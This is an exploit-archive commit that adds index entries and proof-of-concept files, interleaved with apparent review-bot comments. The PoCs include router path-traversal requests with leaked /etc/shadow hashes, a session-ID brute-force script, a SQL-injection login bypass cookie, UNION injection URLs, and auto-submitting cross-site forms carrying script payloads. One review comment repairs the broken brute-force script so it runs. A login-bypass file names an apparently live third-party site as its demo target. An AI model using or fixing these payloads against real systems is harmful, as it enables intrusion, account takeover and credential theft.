Updated 11_23_2014
This commit is contained in:
parent
ba4b116f27
commit
4283820381
13 changed files with 885 additions and 1 deletions
14
files.csv
|
@ -26857,7 +26857,7 @@ id,file,description,date,author,platform,type,port
|
|||
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
|
||||
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
|
||||
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash PoC",2013-11-30,KAI,windows,dos,0
|
||||
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
|
||||
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
|
||||
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
|
||||
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
|
||||
29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0
|
||||
|
@ -31766,6 +31766,7 @@ id,file,description,date,author,platform,type,port
|
|||
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
|
||||
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
|
||||
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
|
||||
35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0
|
||||
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
|
||||
35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
|
||||
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
|
||||
|
@ -31805,3 +31806,14 @@ id,file,description,date,author,platform,type,port
|
|||
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
|
||||
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
|
||||
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
|
||||
35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0
|
||||
35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0
|
||||
35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0
|
||||
35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0
|
||||
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
|
||||
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
|
||||
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
|
||||
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
|
||||
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
|
||||
|
|
|
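Review bot: The new 35321 entry carries 2014-11-22 in the date column while the advisory it indexes (35321.txt in this same commit) gives a release date of 2014-11-07 and a disclosure date of 2014-11-05, and the entries added next to it (35310–35320) keep their original 2011 publication dates rather than the import date, so the column does not appear to be used consistently within this hunk. If the column is meant to be the original publication date, the line should read `35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-07,Vulnerability-Lab,php,webapps,0`; if it is the import date, the 2011-dated lines are the inconsistent ones. Which convention the index follows cannot be told from this page, so the maintainer should pick one and apply it to the whole hunk.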
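--- a/platforms/hardware/remote/35317.txt
+++ b/platforms/hardware/remote/35317.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/46224/info
+
+Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
+
+http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert
+http://www.example.com/conf/ssl/apache/integrity-smartcenter.key
+http://www.example.com/conf/ssl/apache/integrity.cert
+http://www.example.com/conf/ssl/apache/integrity.key
+http://www.example.com/conf/ssl/apache/smartcenter.cert
+http://www.example.com/conf/ssl/integrity-keystore.jks
+http://www.example.com/conf/ssl/isskeys.jks
+http://www.example.com/conf/ssl/openssl.pem
+http://www.example.com/conf/integrity.xml
+http://www.example.com/conf/jaas/users.xml
+http://www.example.com/bin/DBSeed.xml
+http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert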
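Review bot: The PoC lists direct paths to TLS private keys (`integrity-smartcenter.key`, `integrity.key`) and Java keystores (`integrity-keystore.jks`, `isskeys.jks`), but the advisory never says that patching alone does not undo the disclosure: every key or keystore that was reachable has to be treated as compromised and rotated, and `conf/jaas/users.xml` presumably holds account data that should be reset (its contents are not shown here, so confirm). It also omits the affected product versions and whether the paths are reachable without authentication, which is the first thing a reader triaging this needs. I would add after the summary: `Remediation: after patching, rotate every key/keystore listed below and reset any credentials stored in users.xml; affected versions per the vendor advisory.`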
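--- a/platforms/hardware/webapps/35325.txt
+++ b/platforms/hardware/webapps/35325.txt
@@ -0,0 +1,86 @@
+Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit
+
+
+Vendor: NETGEAR
+Product web page: http://www.netgear.com
+Affected version: WNR500 (firmware: 1.0.7.2)
+
+Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
+your legacy Wireless-G network. It is a simple, secure way to share your
+Internet connection and allows you to easily surf the Internet, use email,
+and have online chats. The quick, CD-less setup can be done through a web
+browser. The small, efficient design fits perfectly into your home.
+
+Desc: The router suffers from an authenticated file inclusion vulnerability
+(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
+not properly verified before being used to include files. This can be exploited
+to include files from local resources with directory traversal attacks.
+
+Tested on: mini_httpd/1.19 19dec2003
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2014-5208
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php
+
+
+16.11.2014
+
+--
+
+
+= 1 =============================================================
+
+GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
+Host: 192.168.1.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
+Authorization: Basic YWRtaW46cGFzc3dvcmQ=
+Connection: keep-alive
+
+---
+
+HTTP/1.0 200 OK
+Content-type: text/html
+Cache-Control: no-cache
+set-cookie: sessionid=7dc3268b;
+set-cookie: auth=ok;
+set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
+
+#root:x:0:0:root:/root:/bin/bash
+root:x:0:0:root:/root:/bin/sh
+#tw:x:504:504::/home/tw:/bin/bash
+#tw:x:504:504::/home/tw:/bin/msh
+
+
+= 2 =============================================================
+
+GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
+Host: 192.168.1.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
+Authorization: Basic YWRtaW46cGFzc3dvcmQ=
+Connection: keep-alive
+
+---
+
+HTTP/1.0 200 OK
+Content-type: text/html
+Cache-Control: no-cache
+set-cookie: sessionid=7dc3268b;
+set-cookie: auth=ok;
+set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
+
+#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
+root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
+#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
+#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::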
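Review bot: Both requests authenticate with `Authorization: Basic YWRtaW46cGFzc3dvcmQ=`, which decodes to `admin:password`, so the PoC as shown depends on the factory credentials; the Desc paragraph calls the issue "authenticated" but should state that plainly, because that precondition is what bounds the severity. The requests also carry a client-side `auth=ok` cookie that the server echoes back in `set-cookie`, which hints that login state may be client-asserted — worth testing whether the traversal works with the cookie alone and no Authorization header, since that would make the "authenticated" qualifier moot (an inference from the headers, not demonstrated here). Returning `/etc/shadow` shows the CGI runs with root privileges and that the hashes are MD5-crypt (`$1$`), so a successful read yields offline-crackable admin credentials; I would add that consequence to the Desc paragraph, e.g. `The CGI runs as root, so /etc/shadow is readable and its $1$ hashes can be cracked offline.`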
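--- a/platforms/linux/remote/35314.txt
+++ b/platforms/linux/remote/35314.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46167/info
+
+Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files.
+
+Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.
+
+http://www.exploit-db.com/sploits/35314.pcap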
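Review bot: The only PoC is an off-site link to a binary pcap with no checksum, and the text names neither the affected dissector nor a vendor or CVE reference, so a reader can neither verify the artifact nor tell which Wireshark component is hit. I would add a line such as `SHA-256 of 35314.pcap: <hash>; dissector and fix reference per the vendor advisory linked from the SecurityFocus entry.` so the sample can be checked after download and mapped to a fix.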
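--- a/platforms/multiple/remote/35316.sh
+++ b/platforms/multiple/remote/35316.sh
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/46178/info
+
+The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
+
+An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.
+
+#!/bin/bash
+start=1267604160
+end=1267605960
+for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
+http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
+"1" ] then echo "Session ID Found: $i"
+fi
+if [ $(($i % 100)) -eq "0" ]
+then echo "Currently at $i"
+fi
+done
+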
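Review bot: As pasted the script does not parse: on the `for` line the test `[ ... ] then echo ...` has no `;` or newline before `then`, so bash hands `then` and the echo arguments to `[` (which then reports a missing `]`) and the following `fi` is a syntax error, meaning nobody can run this PoC without first repairing it. The `[ ... -lt "1" ]` comparison also breaks when curl returns nothing (empty left operand), so the count should be captured into a variable and defaulted to 0. The `start`/`end` constants (1267604160–1267605960) look like Unix timestamps from March 2010, which suggests the session ID is time-derived; if so the 1800-second window should be computed from the current clock rather than hard-coded — an inference from the values, not something the advisory states. Note that the `#!/bin/bash` line sits after six lines of prose, so the file would also need the prose moved into comments to be executable as-is.

```shell
# … unchanged: source URL and advisory text above …
#!/bin/bash
start=1267604160
end=1267605960
for (( i=start; i<=end; i++ )); do
    hits=$(curl -s -b "userid=$i" http://10.1.10.1/admin/index.asp | grep -c login.asp)
    if [ "${hits:-0}" -lt 1 ]; then
        echo "Session ID Found: $i"
    fi
    if (( i % 100 == 0 )); then
        echo "Currently at $i"
    fi
done
```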
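--- a/platforms/php/webapps/35271.txt
+++ b/platforms/php/webapps/35271.txt
@@ -0,0 +1,26 @@
+# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
+# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
+# Home : http://milw00rm.com / its online
+# Date : 17.11.2014
+# Demo : http://www.era.sn/courrier
+# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
+# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
+
+you first go here:
+
+http://www.target.com/path/index.php?page=welcome.php
+
+you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
+
+exploit:
+
+javascript:document.cookie = "UserId=[username] ' or '; path=/";
+
+or you edit your cookie's with "Cookies Manager"
+
+name = maarch
+contents = UserId=username ' or '
+host = your target
+path = /script_path/
+
+and dont change other options its keep default.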
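Review bot: The payload `UserId=[username] ' or '` is a SQL injection through the `UserId` cookie value, not merely "insecure cookie handling": the quote and `or` only bypass login if the cookie is concatenated into a query, so the title and any fix guidance should say SQL injection (parameterise the query that reads the cookie, and stop treating a cookie-supplied username as an identity assertion at all). The `# Demo` line points at what appears to be a live third-party installation (`http://www.era.sn/courrier`); a published PoC should reference a local instance or `example.com`, not a production site that readers may now target. I would change that line to `# Demo : http://www.example.com/courrier (local test install)`.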
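--- a/platforms/php/webapps/35315.txt
+++ b/platforms/php/webapps/35315.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46171/info
+
+Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Escortservice 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+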
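Review bot: The injection URL is split across two lines (the column list breaks after `27` and resumes with `,28`), so a reader who copies the PoC line by line sends a truncated query; the advisory should present it on one line or say explicitly that the two fragments must be joined. `version()` is MySQL-specific and the 66-column UNION matches only the schema that was tested, which is worth stating so the PoC is not mistaken for a generic one. I would add `Note: the URL below is one request wrapped for width; the column count (66) and version() are specific to the tested MySQL install.` before it.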
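--- a/platforms/php/webapps/35319.txt
+++ b/platforms/php/webapps/35319.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46250/info
+
+WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+
+http://www.example.com/html/scripts/index.php?>[xss]
+
+http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=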
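Review bot: The first PoC (`index.php?>[xss]`) does not name the parameter that reflects the input, so it cannot be reproduced or fixed from the advisory as written; it should state which query parameter (or the raw query string) is echoed. The second PoC posts `did`, `login`, `first_name`, `custgroupID` and `count_to_export` to what looks like a customer-search/export page, which is typically an administrative function (not verified here), so the advisory should say whether an authenticated admin session is required. I would add `Note: PoC 1 reflects the <parameter name>; PoC 2 is sent to the customer export and presumably requires an administrator session — confirm.` above the URLs.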
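--- a/platforms/php/webapps/35320.txt
+++ b/platforms/php/webapps/35320.txt
@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/46256/info
+
+ViArt Shop is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ViArt Shop 4.0.5 is vulnerable; other versions may also be affected.
+
+1. http://www.example.com/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
+
+2. <form action="http://www.example.com/admin/admin_global_settings.php" method="post" name="main">
+<input type="hidden" name="operation" value="save">
+<input type="hidden" name="rp" value="admin.php">
+<input type="hidden" name="tab" value="general">
+<input type="hidden" name="site_name" value="Default Site">
+<input type="hidden" name="site_url" value="http://host/">
+<input type="hidden" name="admin_email" value="email@example.com">
+<input type="hidden" name="layout_id" value="1">
+<input type="hidden" name="password_encrypt" value="0">
+<input type="hidden" name="admin_password_encrypt" value="0">
+<input type="hidden" name="html_below_footer" value='12345"><script>alert(document.cookie)</script>'>
+
+<input type="hidden" name="operation" value="save">
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+3. <form action="http://www.example.com/admin/admin_manufacturer.php" method="post" name="main">
+<input type="hidden" name="operation" value="save">
+<input type="hidden" name="manufacturer_id" value="3">
+<input type="hidden" name="manufacturer_name" value='Company"><script>alert(document.cookie)</script>'>
+<input type="hidden" name="manufacturer_order" value="1">
+<input type="hidden" name="friendly_url" value="">
+<input type="hidden" name="affiliate_code" value="">
+<input type="hidden" name="short_description" value="">
+<input type="hidden" name="full_description" value="">
+<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
+<input type="hidden" name="image_small_alt" value="company">
+<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
+<input type="hidden" name="image_large_alt" value="company">
+</form>
+<script>
+document.main.submit();
+</script>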
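Review bot: PoCs 2 and 3 are auto-submitting cross-site forms, so they only work if `admin_global_settings.php` and `admin_manufacturer.php` accept a POST with no anti-CSRF token — neither form carries one — and that missing CSRF check is a second defect the vendor fix has to address, separate from output-encoding `html_below_footer` and `manufacturer_name`; the advisory should name it rather than leaving it implicit in the delivery method. PoC 2 also submits `operation=save` twice (once at the top of the form and again after `html_below_footer`), which is harmless in PHP because the last value wins but reads as a paste error and should be dropped. I would add `Note: PoCs 2 and 3 also demonstrate that the admin save handlers lack CSRF protection; a logged-in administrator must load the page for the stored payload to be written.` after the version line.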
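--- a/platforms/php/webapps/35321.txt
+++ b/platforms/php/webapps/35321.txt
@@ -0,0 +1,260 @@
+Document Title:
+===============
+Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1353
+
+
+Release Date:
+=============
+2014-11-07
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1353
+
+
+Common Vulnerability Scoring System:
+====================================
+3.1
+
+
+Product & Service Introduction:
+===============================
+SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
+Without installation and own webspace you can begin to create products and content right after the registration. With our
+free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
+expert to work with the SUPR Shop.
+
+( Copy of the Vendor Homepage: http://de.supr.com/tour )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-11-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Supreme NewMedia GmbH
+Product: Supr - Shopsystem Web Application 5.1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
+The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
+expired session or by local post inject.
+
+The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
+Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
+Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
+POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
+
+The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
+Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
+locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
+
+The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
+Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
+Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
+sources and application-side manipulation of affected or connected module context.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Dashboard > Settings > General > (setting_shopdetail)
+
+Vulnerable Parameter(s):
+[+] blogname
+[+] blog/shop slogan
+[+] tags
+
+Affected Module(s):
+[+] Dashboard (localhost:80/a/wp-admin/[x])
+
+
+Proof of Concept (PoC):
+=======================
+The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Dashboard > Settings > General > (setting_shopdetail)
+
+<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
+<div class="form-row field-error">
+<div class="label">
+<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
+</div>
+<div class="field">
+<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
+<!-- <pre></pre> -->
+<ul class="">
+<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
+</ul></div>
+
+Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
+Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
+locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
+Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
+Request Header:
+Host[localhost:80]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
+Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
+__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
+wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
+wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
+_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
+__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
+__utmb=182188197.24.10.1414786850]
+Connection[keep-alive]
+Cache-Control[max-age=0]
+POST-Daten:
+setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
+setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
+shopreg%5Bshoplang%5D[de_DE]
+setting_shopdata%5Bshoplang%5D[de_DE]
+setting_shopdata%5Bshopcategory%5D[]
+setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
+setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
+setting_shopdata%5Bemailfooter%5D[]
+setting_shopdata%5Binvoicenote%5D[]
+setting_shopdata%5Bshop_google_analytics_account%5D[]
+setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
+setting_shopdata%5Bsubmit%5D[save]
+Response Header:
+Date[Fri, 31 Oct 2014 20:25:22 GMT]
+Server[Apache/2.2.16 (Debian)]
+X-Powered-By[PHP/5.3.3-7+squeeze22]
+p3p[CP="CAO PSA OUR"]
+Expires[Wed, 11 Jan 1984 05:00:00 GMT]
+Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
+Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
+wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
+wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
+Pragma[no-cache]
+X-Frame-Options[SAMEORIGIN]
+Connection[close]
+Content-Type[text/html; charset=UTF-8]
+--
+Status: 200[OK]
+GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
+Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
+Request Header:
+Host[localhost:80]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
+Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
+__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
+wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
+wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
+_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
+__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
+Connection[keep-alive]
+Cache-Control[max-age=0]
+Response Header:
+Date[Fri, 31 Oct 2014 20:25:24 GMT]
+Server[Apache/2.2.16 (Debian)]
+Content-Length[283]
+Keep-Alive[timeout=5, max=8]
+Connection[Keep-Alive]
+Content-Type[text/html; charset=iso-8859-1]
+
+
+Reference(s):
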